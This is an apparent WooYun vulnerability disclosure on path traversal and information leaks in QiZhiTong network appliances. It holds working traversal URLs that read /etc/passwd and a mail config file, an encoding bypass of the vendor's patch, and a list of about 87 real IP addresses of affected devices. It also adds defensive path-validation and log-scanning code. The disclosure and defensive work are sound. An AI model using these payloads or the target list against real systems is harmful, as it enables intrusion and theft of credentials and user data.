
Vulnerability summary

Defect ID: wooyun-2015-0145925

Title: Two arbitrary file traversal issues and a sensitive information disclosure in the 企智通 (QiZhiTong) series of internet behaviour management appliances (none require login)

Vendor: 北京宽广智通信息技术有限公司

Author: YY-2012

Submitted: 2015-10-11 14:20

Fixed: 2016-01-12 10:58

Published: 2016-01-12 10:58

Vulnerability type: arbitrary file traversal / download

Severity: High

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-11: details sent to the vendor, awaiting vendor handling
2015-10-14: vendor confirmed the issue; details visible to the vendor only
2015-10-17: details opened to third-party security partners (绿盟科技 / NSFOCUS, 唐朝安全巡航)
2015-12-08: details opened to core white hats and domain experts
2015-12-18: details opened to regular white hats
2015-12-28: details opened to intern white hats
2016-01-12: details opened to the public

Summary:

Some devices have already been patched, but the patch merely filters characters.

Details:

http://gd.189.cn/biz/introd/infor/xxaq/2011/10/18/10083.htm
It appears to affect every model in the series:
企智通MINI型, 企智通I型, 企智通II型, 企智通III型, 企智通IV型, 企智通V型, 企智通IX型
(On some devices the filter can be bypassed by replacing "." with "%2e".) First arbitrary file traversal (directory listing is also possible):

http://url/test/downTcpdumpFile.jsp?filename=../conf/email.cfg


(On some devices the filter can be bypassed by replacing "." with "%2e".) Second arbitrary file traversal (directory listing is also possible):

http://url/report/rp_download.jsp?file=/etc/passwd&null=null


Sensitive information disclosure (there are too many pages to list; one example is given here, and the rest follow the same pattern):

http://url/BEAP/user_eqp_batexport.jsp
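The report's point is that stripping a literal ".." from the parameter is not a fix, because the check runs on one representation of the path and the filesystem sees another. The following added example, which is not the vendor's code and assumes a constructed download root of /opt/device/tcpdump, models that character-stripping filter beside a canonicalising check that decodes first, normalises, and then requires the result to stay inside the intended directory:

```python
"""Added example (not the appliance vendor's code): a model of a strip-".."
filter next to a canonicalising containment check that resists %2e encoding."""
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed directory the download handler is meant to serve from (constructed; not the appliance's real path).
DOWNLOAD_ROOT = "/opt/device/tcpdump"


def _decode_fully(value: str, max_rounds: int = 3) -> Optional[str]:
    """URL-decode until the string stops changing, so '%2e%2e' and the
    double-encoded '%252e%252e' both end up as '..'. Returns None when the
    value is still changing after max_rounds, which is itself a reason to refuse."""
    current = value
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            return current
        current = decoded
    return None


def weak_filter_resolve(filename: str) -> str:
    """Models the patched-but-bypassable behaviour the report describes: the filter
    removes the literal '../' from the raw parameter, and only afterwards does the
    file layer percent-decode the value, so '%2e%2e/' survives and becomes '../'."""
    stripped = filename.replace("../", "")
    return posixpath.normpath(DOWNLOAD_ROOT + "/" + unquote(stripped))


def safe_resolve(filename: str) -> Optional[str]:
    """Hardened version: decode first, reject obviously hostile input, canonicalise,
    then require the result to remain inside DOWNLOAD_ROOT.
    Returns the resolved path, or None when the request must be refused."""
    decoded = _decode_fully(filename)
    if not decoded:
        return None
    # NUL bytes, backslashes and absolute paths have no business in a file name.
    if "\x00" in decoded or "\\" in decoded or decoded.startswith("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(DOWNLOAD_ROOT, decoded))
    # Equality would hand out the directory itself (a listing); anything that
    # does not carry the root prefix has traversed out of it.
    if candidate == DOWNLOAD_ROOT or not candidate.startswith(DOWNLOAD_ROOT + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for probe in ("capture1.pcap", "../conf/email.cfg", "%2e%2e/conf/email.cfg"):
        print(f"{probe!r}: weak -> {weak_filter_resolve(probe)}, safe -> {safe_resolve(probe)}")
```

The containment test is the part that matters: once the path is normalised, a single prefix comparison covers every encoding trick, whereas a denylist of characters has to anticipate each one. In a servlet the same check would be applied to the already-decoded parameter value, with the resolved path additionally restricted to an allowlisted file extension.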

Proof of concept:

Present on some devices:

[Screenshots 1 to 5: responses to the traversal requests; images not preserved]


On some devices the filter can be bypassed by replacing "." with "%2e":

[Screenshots 6 and 7: responses after the "%2e" bypass; images not preserved]


Directory listing is also possible:

[Screenshots 8 and 9: directory listings; images not preserved]


Affected instances (the same set of instances as wooyun-2015-0139442):

http://202.105.31.122:8888/customer.jsp
https://58.60.63.161/customer.jsp
http://116.6.87.76:8888/customer.jsp
http://219.129.23.92:8888/customer.jsp
https://14.18.144.27/customer.jsp
http://183.63.91.226:8888/customer.jsp
http://58.248.137.84:8888/customer.jsp
http://183.63.226.56:8888/customer.jsp
https://61.145.196.85/customer.jsp
http://119.146.1.2:8888/customer.jsp
https://183.62.21.51/customer.jsp
http://119.130.114.44:8888/customer.jsp
http://119.130.114.74:8888/customer.jsp
http://125.88.35.170:8888/customer.jsp
http://121.10.222.82:8888/customer.jsp
http://202.105.31.123:8888/customer.jsp
https://183.62.27.21/customer.jsp
https://59.41.254.150/customer.jsp
https://202.105.31.125/customer.jsp
http://219.129.31.170/customer.jsp
http://202.105.31.124:8888/customer.jsp
https://202.105.237.210/customer.jsp
https://183.62.21.50/customer.jsp
http://119.130.114.51:8888/customer.jsp
https://183.62.30.3/customer.jsp
http://202.105.31.126:8888/customer.jsp
http://121.13.250.199:8080/customer.jsp
https://183.62.27.22/customer.jsp
http://59.41.70.194:8888/customer.jsp
http://120.236.48.72/customer.jsp
https://183.63.166.179/customer.jsp
http://183.63.226.62:8888/customer.jsp
http://125.89.68.186/customer.jsp
https://61.145.196.89/customer.jsp
http://119.146.1.2/customer.jsp
http://121.8.187.250:8888/customer.jsp
http://58.252.169.206/customer.jsp
https://113.106.152.98/customer.jsp
http://119.145.67.138:8888/customer.jsp
http://183.63.137.154:8888/customer.jsp
https://61.144.72.202/customer.jsp
http://59.38.32.174:8888/customer.jsp
http://183.63.163.202:8888/customer.jsp
http://183.63.164.34:8888/customer.jsp
http://61.144.72.26:8888/customer.jsp
https://14.23.152.82/customer.jsp
http://125.88.35.187:8888/customer.jsp
https://183.62.27.19/customer.jsp
http://119.130.114.68:8888/customer.jsp
http://113.106.170.74:8888/customer.jsp
https://59.34.231.66/customer.jsp
https://183.62.30.6/customer.jsp
http://183.237.7.233:8888/customer.jsp
http://121.33.227.106:8888/customer.jsp
https://125.90.4.154/customer.jsp
http://113.108.143.186:8888/customer.jsp
http://183.63.91.228:8888/customer.jsp
http://219.132.63.186:8888/customer.jsp
http://119.145.16.200:8888/customer.jsp
http://218.14.208.104:8888/customer.jsp
http://183.63.226.53:8888/customer.jsp
http://183.63.165.50:8888/customer.jsp
https://202.105.237.234/customer.jsp
https://202.105.237.198/customer.jsp
https://202.105.237.194/customer.jsp
https://202.105.31.122/customer.jsp
https://183.62.21.52/customer.jsp
https://183.62.27.18/customer.jsp
https://183.62.27.20/customer.jsp
https://219.129.63.146/customer.jsp
https://113.106.104.242/customer.jsp
http://183.63.137.157:8888/customer.jsp
http://113.105.0.68:8888/customer.jsp
http://113.105.0.66:8888/customer.jsp
https://202.105.31.124/customer.jsp
http://202.105.31.125:8888/customer.jsp
https://183.62.30.2/customer.jsp
https://125.89.236.50/customer.jsp
https://219.132.61.10/customer.jsp
https://112.91.177.210/customer.jsp
https://125.90.0.210/customer.jsp
http://121.33.227.107:8888/customer.jsp
http://1.202.96.16:8888/customer.jsp
https://61.131.61.34/customer.jsp
https://59.61.238.158/customer.jsp
http://183.63.129.106:8888/customer.jsp
https://113.98.123.146/customer.jsp

Remediation:

1. Add authentication and authorization checks to these pages.
2. Do not push the patch only to the instances listed above; there are far more users, so push it to every deployment.
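Until every deployment has received the patch, operators can at least see whether the three pages named above are being probed. The following added example, which is not part of the report and runs over constructed access-log lines, flags requests to those endpoints and decodes the file parameter before inspecting it, so "%2e%2e" and double-encoded variants are caught as readily as a plain "../":

```python
"""Added example (not from the report or the vendor): scan web-server access logs
for requests to the endpoints named in the report. Log lines are constructed."""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoints from the report, mapped to the query parameter that carries the file path.
# None marks the unauthenticated export page, where any hit deserves a look.
WATCHED_ENDPOINTS = {
    "/test/downTcpdumpFile.jsp": "filename",
    "/report/rp_download.jsp": "file",
    "/BEAP/user_eqp_batexport.jsp": None,
}

# Common/combined log format: client ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample lines; 10.0.0.9 models the probing described in the report.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Oct/2015:14:20:01 +0800] "GET /test/downTcpdumpFile.jsp?filename=capture.pcap HTTP/1.1" 200 5120',
    '10.0.0.9 - - [11/Oct/2015:14:21:14 +0800] "GET /test/downTcpdumpFile.jsp?filename=%2e%2e/conf/email.cfg HTTP/1.1" 200 812',
    '10.0.0.9 - - [11/Oct/2015:14:21:30 +0800] "GET /report/rp_download.jsp?file=/etc/passwd&null=null HTTP/1.1" 200 1430',
    '10.0.0.9 - - [11/Oct/2015:14:22:02 +0800] "GET /BEAP/user_eqp_batexport.jsp HTTP/1.1" 200 20480',
    '10.0.0.7 - - [11/Oct/2015:14:23:45 +0800] "GET /customer.jsp HTTP/1.1" 200 3300',
]


def classify_target(target: str) -> Optional[Tuple[str, str]]:
    """Return (endpoint, reason) when the request target is worth an alert, else None."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    if path not in WATCHED_ENDPOINTS:
        return None
    param = WATCHED_ENDPOINTS[path]
    if param is None:
        return path, "hit on unauthenticated export endpoint"
    # parse_qs decodes once; the extra unquote catches double-encoded dots.
    for raw in parse_qs(parts.query).get(param, []):
        value = unquote(raw)
        if value.startswith("/") or "\\" in value or ".." in value.split("/"):
            return path, f"path traversal in {param}={value}"
    return None


def scan_log(lines: List[str]) -> List[Tuple[str, str, str, int]]:
    """Return (client, endpoint, reason, status) for every suspicious request."""
    alerts = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        client, _method, target, status = match.groups()
        verdict = classify_target(target)
        if verdict:
            alerts.append((client, verdict[0], verdict[1], int(status)))
    return alerts


if __name__ == "__main__":
    for client, endpoint, reason, status in scan_log(SAMPLE_LOG):
        print(f"{client} {status} {endpoint}: {reason}")
```

A 200 status on one of these requests from a client that never authenticated is the signal to act on; a clean request to downTcpdumpFile.jsp for a capture file is expected traffic and is deliberately left alone.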

Copyright notice: when reproducing, credit the source: YY-2012@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 8

Confirmed: 2015-10-14 10:57

Vendor reply:

Sorry, we have only just seen the vulnerability report. Testing confirms that the issue exists, and we are organising a fix and upgrade plan.

Latest status:

None yet